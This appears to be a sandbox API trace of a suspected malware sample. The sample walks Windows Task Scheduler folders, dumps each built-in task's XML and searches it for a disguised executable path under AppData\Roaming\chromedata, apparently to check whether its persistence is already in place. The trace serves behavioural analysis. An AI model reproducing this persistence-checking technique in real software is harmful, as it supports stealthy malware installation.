	[0100.689] ITaskFolder:GetTasks (in: This=0x63fe10, flags=1, ppTasks=0x128e40 | out: ppTasks=0x128e40*=0x63fe78) returned 0x0
	[0100.690] IRegisteredTaskCollection:get_Count (in: This=0x63fe78, pCount=0x128e30 | out: pCount=0x128e30*=1) returned 0x0
	[0100.691] IRegisteredTaskCollection:get_Item (in: This=0x63fe78, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfe10, wReserved3=0x63, varVal1=0x1, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x63ff50) returned 0x0
	[0100.691] IRegisteredTask:get_Name (in: This=0x63ff50, pName=0x128e3c | out: pName=0x128e3c*="ResolutionHost") returned 0x0
	[0100.691] IRegisteredTask:get_Xml (in: This=0x63ff50, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Author>$(@%systemroot%\\system32\\dps.dll,-600)</Author>\r\n    <Version>1.0</Version>\r\n    <Source>$(@%systemroot%\\system32\\dps.dll,-601)</Source>\r\n    <URI>Microsoft\\Windows\\WDI\\ResolutionHost</URI>\r\n    <Description>$(@%systemroot%\\system32\\dps.dll,-602)</Description>\r\n    <SecurityDescriptor>O:BAG:BAD:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;IU)(A;;FRFX;;;S-1-5-80-2970612574-78537857-698502321-558674196-1451644582)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Settings>\r\n    <Enabled>true</Enabled>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n    <Hidden>true</Hidden>\r\n    <Priority>10</Priority>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"Users\">\r\n      <GroupId>S-1-5-4</GroupId>\r\n      <RunLevel>HighestAvailable</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"Users\">\r\n    <ComHandler>\r\n      <ClassId>{900be39d-6be8-461a-bc4d-b0fa71f5ecb1}</ClassId>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0100.693] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Author>$(@%systemroot%\\system32\\dps.dll,-600)</Author>\r\n    <Version>1.0</Version>\r\n    <Source>$(@%systemroot%\\system32\\dps.dll,-601)</Source>\r\n    <URI>Microsoft\\Windows\\WDI\\ResolutionHost</URI>\r\n    <Description>$(@%systemroot%\\system32\\dps.dll,-602)</Description>\r\n    <SecurityDescriptor>O:BAG:BAD:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;IU)(A;;FRFX;;;S-1-5-80-2970612574-78537857-698502321-558674196-1451644582)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Settings>\r\n    <Enabled>true</Enabled>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n    <Hidden>true</Hidden>\r\n    <Priority>10</Priority>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"Users\">\r\n      <GroupId>S-1-5-4</GroupId>\r\n      <RunLevel>HighestAvailable</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"Users\">\r\n    <ComHandler>\r\n      <ClassId>{900be39d-6be8-461a-bc4d-b0fa71f5ecb1}</ClassId>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0100.714] IUnknown:Release (This=0x63ff50) returned 0x0
	[0100.714] IUnknown:Release (This=0x63fe78) returned 0x0
	[0100.714] ITaskFolder:GetFolders (in: This=0x63fe10, flags=0, ppFolders=0x128e34 | out: ppFolders=0x128e34*=0x63fe78) returned 0x0
	[0100.715] ITaskFolderCollection:get_Count (in: This=0x63fe78, pCount=0x128e2c | out: pCount=0x128e2c*=0) returned 0x0
	[0100.715] IUnknown:Release (This=0x63fe78) returned 0x0
	[0100.715] TaskScheduler:IUnknown:Release (This=0x63fe10) returned 0x0
	[0100.715] ITaskFolderCollection:get_Item (in: This=0x63fd30, index=0x128e4c*(varType=0x3, wReserved1=0x0, wReserved2=0x1, wReserved3=0x0, varVal1=0x29, varVal2=0x76fa8cd5), ppFolder=0x128f6c | out: ppFolder=0x128f6c*=0x63fe10) returned 0x0
	[0100.715] ITaskFolder:GetTasks (in: This=0x63fe10, flags=1, ppTasks=0x128e40 | out: ppTasks=0x128e40*=0x63fea0) returned 0x0
	[0100.717] IRegisteredTaskCollection:get_Count (in: This=0x63fea0, pCount=0x128e30 | out: pCount=0x128e30*=1) returned 0x0
	[0100.717] IRegisteredTaskCollection:get_Item (in: This=0x63fea0, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfe10, wReserved3=0x63, varVal1=0x1, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x1691048) returned 0x0
	[0100.717] IRegisteredTask:get_Name (in: This=0x1691048, pName=0x128e3c | out: pName=0x128e3c*="QueueReporting") returned 0x0
	[0100.717] IRegisteredTask:get_Xml (in: This=0x1691048, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <SecurityDescriptor>D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;WD)</SecurityDescriptor>\r\n    <URI>\\Microsoft\\Windows\\Windows Error Reporting\\QueueReporting</URI>\r\n    <Source>$(@%SystemRoot%\\system32\\wer.dll,-292)</Source>\r\n    <Author>$(@%SystemRoot%\\system32\\wer.dll,-293)</Author>\r\n    <Description>$(@%SystemRoot%\\system32\\wer.dll,-294)</Description>\r\n    <Version>1.0</Version>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <LogonTrigger>\r\n      <Delay>PT13M</Delay>\r\n    </LogonTrigger>\r\n  </Triggers>\r\n  <Settings>\r\n    <Enabled>false</Enabled>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Priority>5</Priority>\r\n    <IdleSettings>\r\n      <StopOnIdleEnd>false</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"AllUsers\">\r\n      <GroupId>S-1-5-32-545</GroupId>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"AllUsers\">\r\n    <Exec>\r\n      <Command>%windir%\\system32\\wermgr.exe</Command>\r\n      <Arguments>-queuereporting</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0100.719] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <SecurityDescriptor>D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;WD)</SecurityDescriptor>\r\n    <URI>\\Microsoft\\Windows\\Windows Error Reporting\\QueueReporting</URI>\r\n    <Source>$(@%SystemRoot%\\system32\\wer.dll,-292)</Source>\r\n    <Author>$(@%SystemRoot%\\system32\\wer.dll,-293)</Author>\r\n    <Description>$(@%SystemRoot%\\system32\\wer.dll,-294)</Description>\r\n    <Version>1.0</Version>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <LogonTrigger>\r\n      <Delay>PT13M</Delay>\r\n    </LogonTrigger>\r\n  </Triggers>\r\n  <Settings>\r\n    <Enabled>false</Enabled>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Priority>5</Priority>\r\n    <IdleSettings>\r\n      <StopOnIdleEnd>false</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"AllUsers\">\r\n      <GroupId>S-1-5-32-545</GroupId>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"AllUsers\">\r\n    <Exec>\r\n      <Command>%windir%\\system32\\wermgr.exe</Command>\r\n      <Arguments>-queuereporting</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0100.743] IUnknown:Release (This=0x1691048) returned 0x0
	[0100.743] IUnknown:Release (This=0x63fea0) returned 0x0
	[0100.743] ITaskFolder:GetFolders (in: This=0x63fe10, flags=0, ppFolders=0x128e34 | out: ppFolders=0x128e34*=0x63fea0) returned 0x0
	[0100.744] ITaskFolderCollection:get_Count (in: This=0x63fea0, pCount=0x128e2c | out: pCount=0x128e2c*=0) returned 0x0
	[0100.744] IUnknown:Release (This=0x63fea0) returned 0x0
	[0100.744] TaskScheduler:IUnknown:Release (This=0x63fe10) returned 0x0
	[0100.744] ITaskFolderCollection:get_Item (in: This=0x63fd30, index=0x128e4c*(varType=0x3, wReserved1=0x0, wReserved2=0x1, wReserved3=0x0, varVal1=0x2a, varVal2=0x76fa8cd5), ppFolder=0x128f6c | out: ppFolder=0x128f6c*=0x63fe10) returned 0x0
	[0100.744] ITaskFolder:GetTasks (in: This=0x63fe10, flags=1, ppTasks=0x128e40 | out: ppTasks=0x128e40*=0x63fea8) returned 0x0
	[0100.746] IRegisteredTaskCollection:get_Count (in: This=0x63fea8, pCount=0x128e30 | out: pCount=0x128e30*=1) returned 0x0
	[0100.746] IRegisteredTaskCollection:get_Item (in: This=0x63fea8, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfe10, wReserved3=0x63, varVal1=0x1, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x1691048) returned 0x0
	[0100.746] IRegisteredTask:get_Name (in: This=0x1691048, pName=0x128e3c | out: pName=0x128e3c*="BfeOnServiceStartTypeChange") returned 0x0
	[0100.746] IRegisteredTask:get_Xml (in: This=0x1691048, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>\\Microsoft\\Windows\\Windows Filtering Platform\\BfeOnServiceStartTypeChange</URI>\r\n    <Author>$(@%SystemRoot%\\system32\\bfe.dll,-2001)</Author>\r\n    <Description>$(@%SystemRoot%\\system32\\bfe.dll,-2002)</Description>\r\n  </RegistrationInfo>\r\n  <Principals>\r\n    <Principal id=\"LocalSystem\">\r\n      <UserId>S-1-5-18</UserId>\r\n    </Principal>\r\n  </Principals>\r\n  <Triggers>\r\n    <EventTrigger id=\"06688f40-e0af-4efa-8a89-2617bd993d71\">\r\n      <Subscription>&lt;QueryList&gt;&lt;Query Id=\"0\" Path=\"System\"&gt;&lt;Select Path=\"System\"&gt;*/System/Provider[@Name='Service Control Manager'] and */System/EventID='7040' and */EventData/Data[@Name='param4']='BFE'&lt;/Select&gt;&lt;/Query&gt;&lt;/QueryList&gt;</Subscription>\r\n    </EventTrigger>\r\n  </Triggers>\r\n  <Settings>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>false</AllowHardTerminate>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <AllowStartOnDemand>false</AllowStartOnDemand>\r\n    <Hidden>true</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <WakeToRun>false</WakeToRun>\r\n    <Priority>7</Priority>\r\n    <MultipleInstancesPolicy>Queue</MultipleInstancesPolicy>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Actions Context=\"LocalSystem\">\r\n    <Exec>\r\n      <Command>%windir%\\system32\\rundll32.exe</Command>\r\n      <Arguments>bfe.dll,BfeOnServiceStartTypeChange</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0100.748] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>\\Microsoft\\Windows\\Windows Filtering Platform\\BfeOnServiceStartTypeChange</URI>\r\n    <Author>$(@%SystemRoot%\\system32\\bfe.dll,-2001)</Author>\r\n    <Description>$(@%SystemRoot%\\system32\\bfe.dll,-2002)</Description>\r\n  </RegistrationInfo>\r\n  <Principals>\r\n    <Principal id=\"LocalSystem\">\r\n      <UserId>S-1-5-18</UserId>\r\n    </Principal>\r\n  </Principals>\r\n  <Triggers>\r\n    <EventTrigger id=\"06688f40-e0af-4efa-8a89-2617bd993d71\">\r\n      <Subscription>&lt;QueryList&gt;&lt;Query Id=\"0\" Path=\"System\"&gt;&lt;Select Path=\"System\"&gt;*/System/Provider[@Name='Service Control Manager'] and */System/EventID='7040' and */EventData/Data[@Name='param4']='BFE'&lt;/Select&gt;&lt;/Query&gt;&lt;/QueryList&gt;</Subscription>\r\n    </EventTrigger>\r\n  </Triggers>\r\n  <Settings>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>false</AllowHardTerminate>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <AllowStartOnDemand>false</AllowStartOnDemand>\r\n    <Hidden>true</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <WakeToRun>false</WakeToRun>\r\n    <Priority>7</Priority>\r\n    <MultipleInstancesPolicy>Queue</MultipleInstancesPolicy>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Actions Context=\"LocalSystem\">\r\n    <Exec>\r\n      <Command>%windir%\\system32\\rundll32.exe</Command>\r\n      <Arguments>bfe.dll,BfeOnServiceStartTypeChange</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0100.779] IUnknown:Release (This=0x1691048) returned 0x0
	[0100.779] IUnknown:Release (This=0x63fea8) returned 0x0
	[0100.779] ITaskFolder:GetFolders (in: This=0x63fe10, flags=0, ppFolders=0x128e34 | out: ppFolders=0x128e34*=0x63fea8) returned 0x0
	[0100.780] ITaskFolderCollection:get_Count (in: This=0x63fea8, pCount=0x128e2c | out: pCount=0x128e2c*=0) returned 0x0
	[0100.780] IUnknown:Release (This=0x63fea8) returned 0x0
	[0100.780] TaskScheduler:IUnknown:Release (This=0x63fe10) returned 0x0
	[0100.780] ITaskFolderCollection:get_Item (in: This=0x63fd30, index=0x128e4c*(varType=0x3, wReserved1=0x0, wReserved2=0x1, wReserved3=0x0, varVal1=0x2b, varVal2=0x76fa8cd5), ppFolder=0x128f6c | out: ppFolder=0x128f6c*=0x63fe10) returned 0x0
	[0100.780] ITaskFolder:GetTasks (in: This=0x63fe10, flags=1, ppTasks=0x128e40 | out: ppTasks=0x128e40*=0x63fea0) returned 0x0
	[0100.782] IRegisteredTaskCollection:get_Count (in: This=0x63fea0, pCount=0x128e30 | out: pCount=0x128e30*=1) returned 0x0
	[0100.782] IRegisteredTaskCollection:get_Item (in: This=0x63fea0, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfe10, wReserved3=0x63, varVal1=0x1, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x1691048) returned 0x0
	[0100.782] IRegisteredTask:get_Name (in: This=0x1691048, pName=0x128e3c | out: pName=0x128e3c*="UpdateLibrary") returned 0x0
	[0100.782] IRegisteredTask:get_Xml (in: This=0x1691048, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>Microsoft\\Windows\\Windows Media Sharing\\UpdateLibrary</URI>\r\n    <SecurityDescriptor>D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;AU)</SecurityDescriptor>\r\n    <Author>$(@%ProgramFiles%\\Windows Media Player\\wmpnscfg.exe,-1001)</Author>\r\n    <Description>$(@%ProgramFiles%\\Windows Media Player\\wmpnscfg.exe,-1002)</Description>\r\n    <Version>1.0</Version>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <EventTrigger>\r\n      <Enabled>true</Enabled>\r\n      <Subscription>&lt;QueryList&gt;\r\n              &lt;Query\r\n                  Id=\"0\"\r\n                  Path=\"System\"\r\n                  &gt;\r\n                &lt;Select Path=\"System\"&gt;*[System[Provider[@Name='Microsoft-Windows-WMPNSS-Service'] and (EventID=14210)]]&lt;/Select&gt;\r\n              &lt;/Query&gt;\r\n            &lt;/QueryList&gt;</Subscription>\r\n    </EventTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"AuthenticatedUsers\">\r\n      <GroupId>S-1-5-11</GroupId>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"AuthenticatedUsers\">\r\n    <Exec>\r\n      <Command>\"%ProgramFiles%\\Windows Media Player\\wmpnscfg.exe\"</Command>\r\n    </Exec>\r\n  </Actions>\r\n  <Settings>\r\n    <Enabled>true</Enabled>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n  </Settings>\r\n</Task>") returned 0x0
	[0100.784] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>Microsoft\\Windows\\Windows Media Sharing\\UpdateLibrary</URI>\r\n    <SecurityDescriptor>D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;AU)</SecurityDescriptor>\r\n    <Author>$(@%ProgramFiles%\\Windows Media Player\\wmpnscfg.exe,-1001)</Author>\r\n    <Description>$(@%ProgramFiles%\\Windows Media Player\\wmpnscfg.exe,-1002)</Description>\r\n    <Version>1.0</Version>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <EventTrigger>\r\n      <Enabled>true</Enabled>\r\n      <Subscription>&lt;QueryList&gt;\r\n              &lt;Query\r\n                  Id=\"0\"\r\n                  Path=\"System\"\r\n                  &gt;\r\n                &lt;Select Path=\"System\"&gt;*[System[Provider[@Name='Microsoft-Windows-WMPNSS-Service'] and (EventID=14210)]]&lt;/Select&gt;\r\n              &lt;/Query&gt;\r\n            &lt;/QueryList&gt;</Subscription>\r\n    </EventTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"AuthenticatedUsers\">\r\n      <GroupId>S-1-5-11</GroupId>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"AuthenticatedUsers\">\r\n    <Exec>\r\n      <Command>\"%ProgramFiles%\\Windows Media Player\\wmpnscfg.exe\"</Command>\r\n    </Exec>\r\n  </Actions>\r\n  <Settings>\r\n    <Enabled>true</Enabled>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n  </Settings>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0100.810] IUnknown:Release (This=0x1691048) returned 0x0
	[0100.810] IUnknown:Release (This=0x63fea0) returned 0x0
	[0100.810] ITaskFolder:GetFolders (in: This=0x63fe10, flags=0, ppFolders=0x128e34 | out: ppFolders=0x128e34*=0x63fea0) returned 0x0
	[0100.811] ITaskFolderCollection:get_Count (in: This=0x63fea0, pCount=0x128e2c | out: pCount=0x128e2c*=0) returned 0x0
	[0100.812] IUnknown:Release (This=0x63fea0) returned 0x0
	[0100.812] TaskScheduler:IUnknown:Release (This=0x63fe10) returned 0x0
	[0100.812] ITaskFolderCollection:get_Item (in: This=0x63fd30, index=0x128e4c*(varType=0x3, wReserved1=0x0, wReserved2=0x1, wReserved3=0x0, varVal1=0x2c, varVal2=0x76fa8cd5), ppFolder=0x128f6c | out: ppFolder=0x128f6c*=0x63fe10) returned 0x0
	[0100.812] ITaskFolder:GetTasks (in: This=0x63fe10, flags=1, ppTasks=0x128e40 | out: ppTasks=0x128e40*=0x63fe40) returned 0x0
	[0100.813] IRegisteredTaskCollection:get_Count (in: This=0x63fe40, pCount=0x128e30 | out: pCount=0x128e30*=1) returned 0x0
	[0100.813] IRegisteredTaskCollection:get_Item (in: This=0x63fe40, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfe10, wReserved3=0x63, varVal1=0x1, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x63ff38) returned 0x0
	[0100.813] IRegisteredTask:get_Name (in: This=0x63ff38, pName=0x128e3c | out: pName=0x128e3c*="ConfigNotification") returned 0x0
	[0100.813] IRegisteredTask:get_Xml (in: This=0x63ff38, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Source>Microsoft Corporation</Source>\r\n    <Author>Microsoft Corporation</Author>\r\n    <Description>This scheduled task notifies the user that Windows Backup has not been configured.</Description>\r\n    <URI>Microsoft\\Windows\\WindowsBackup\\ConfigNotification</URI>\r\n    <SecurityDescriptor>D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FA;;;S-1-5-87-2230524765-2343657310-2007128508-572789919-1856712407)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <CalendarTrigger>\r\n      <StartBoundary>2010-11-27T10:00:00</StartBoundary>\r\n      <Enabled>true</Enabled>\r\n      <ScheduleByDay>\r\n        <DaysInterval>1</DaysInterval>\r\n      </ScheduleByDay>\r\n    </CalendarTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"LocalService\">\r\n      <UserId>S-1-5-19</UserId>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n      <LogonType>InteractiveToken</LogonType>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <IdleSettings>\r\n      <StopOnIdleEnd>true</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>true</Enabled>\r\n    <Hidden>false</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <DisallowStartOnRemoteAppSession>false</DisallowStartOnRemoteAppSession>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <WakeToRun>false</WakeToRun>\r\n    <ExecutionTimeLimit>PT72H</ExecutionTimeLimit>\r\n    <Priority>7</Priority>\r\n  </Settings>\r\n  <Actions Context=\"LocalService\">\r\n    <Exec>\r\n      <Command>%systemroot%\\System32\\sdclt.exe</Command>\r\n      <Arguments>/CONFIGNOTIFICATION</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0100.817] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Source>Microsoft Corporation</Source>\r\n    <Author>Microsoft Corporation</Author>\r\n    <Description>This scheduled task notifies the user that Windows Backup has not been configured.</Description>\r\n    <URI>Microsoft\\Windows\\WindowsBackup\\ConfigNotification</URI>\r\n    <SecurityDescriptor>D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FA;;;S-1-5-87-2230524765-2343657310-2007128508-572789919-1856712407)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <CalendarTrigger>\r\n      <StartBoundary>2010-11-27T10:00:00</StartBoundary>\r\n      <Enabled>true</Enabled>\r\n      <ScheduleByDay>\r\n        <DaysInterval>1</DaysInterval>\r\n      </ScheduleByDay>\r\n    </CalendarTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"LocalService\">\r\n      <UserId>S-1-5-19</UserId>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n      <LogonType>InteractiveToken</LogonType>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <IdleSettings>\r\n      <StopOnIdleEnd>true</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>true</Enabled>\r\n    <Hidden>false</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <DisallowStartOnRemoteAppSession>false</DisallowStartOnRemoteAppSession>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <WakeToRun>false</WakeToRun>\r\n    <ExecutionTimeLimit>PT72H</ExecutionTimeLimit>\r\n    <Priority>7</Priority>\r\n  </Settings>\r\n  <Actions Context=\"LocalService\">\r\n    <Exec>\r\n      <Command>%systemroot%\\System32\\sdclt.exe</Command>\r\n      <Arguments>/CONFIGNOTIFICATION</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0100.850] IUnknown:Release (This=0x63ff38) returned 0x0
	[0100.850] IUnknown:Release (This=0x63fe40) returned 0x0
	[0100.850] ITaskFolder:GetFolders (in: This=0x63fe10, flags=0, ppFolders=0x128e34 | out: ppFolders=0x128e34*=0x63fe40) returned 0x0
	[0100.852] ITaskFolderCollection:get_Count (in: This=0x63fe40, pCount=0x128e2c | out: pCount=0x128e2c*=0) returned 0x0
